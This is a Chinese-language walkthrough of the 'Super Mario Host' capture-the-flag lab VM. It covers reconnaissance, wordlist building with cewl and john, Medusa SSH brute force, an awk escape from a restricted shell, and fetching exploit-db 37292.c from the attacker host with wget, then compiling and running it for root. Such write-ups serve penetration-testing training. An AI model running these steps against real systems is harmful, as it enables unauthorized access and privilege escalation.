Super Mario Host_1 超级玛丽靶机

一．设备：

Kaili: 192.168.56.102

靶机：192.168.56.101

 

二．步骤

（1）信息搜集

使用nmap搜集主机信息，nmap -sV 192.168.56.101

获得信息，目标主机开放了22和8180端口

（2）端口探查

22端口是ssh服务端口，先放着优先探测大端口，用网页进入该端口发现没有什么可使用信息

再用dirb命令使用大字典对靶机进行目录探测（默认字典经常会漏掉一些东西）

分别进入这两个目录，第一个目录没有什么可用信息，访问第二个目录得到了靶机的服务器名称为：：mario.supermariohost.local，然后访问这个服务器发现无法访问，更改kaili的hosts文件中添加配置信息保存即可访问（这一步的目的是为了让域名解析）然后访问mario.supermariohost.local:8180，就可以访问成功了[

（3）获取ssh用户名密码

但是访问后并没有得到什么可用信息，于是使用御剑后台扫描，对mario.supermariohost.local:8180进行扫描，得到的目标逐一访问，然后在luigi.PHP中发现铭感信息。

访问之后使用cewl命令将此页面中的内容生成自定义字典common.txt

Cewl http://mario.supermariohost.local:8180/luigi.php -d -w common.txt

在浏览器中访问字典筛选common.txt信息，再用john命令根据自定义字典，生成相应的用户名和密码的字典

使用美杜莎暴力破解ssh密码

得到用户名：luigi   密码：luigi1 

（4）使用ssh远程登陆靶机

Ls查看目录下文件，发现只有一个message文件，打开得知只有一个壳

（5）提权

使用whoami，pwd等命令发现都不可用

输入？查看该shell能使用的命令

经过百度查询了解到使用awk 'BEGIN{system("/bin/bash")}'可以绕过壳，查看到该靶机使用的是linux3.13.0内核，通过互联网漏洞库搜索该版本漏洞

有多个提权程序，本次使用37292.c，复制到/var/www/html目录下

cp  /usr/share/exploitdb/exploits/linux/local/37292.c  /var/www/html/37292.c

再进入复制好的文件夹中

cd /var/www/html/37292.c

打开apsche服务:        service apache2 start

 

在ssh登陆界面下载该漏洞，编译c语言脚本并执行，拿到root权限

wget http://192.168.56.102/37292.c

gcc 37292.c –o exp

./exp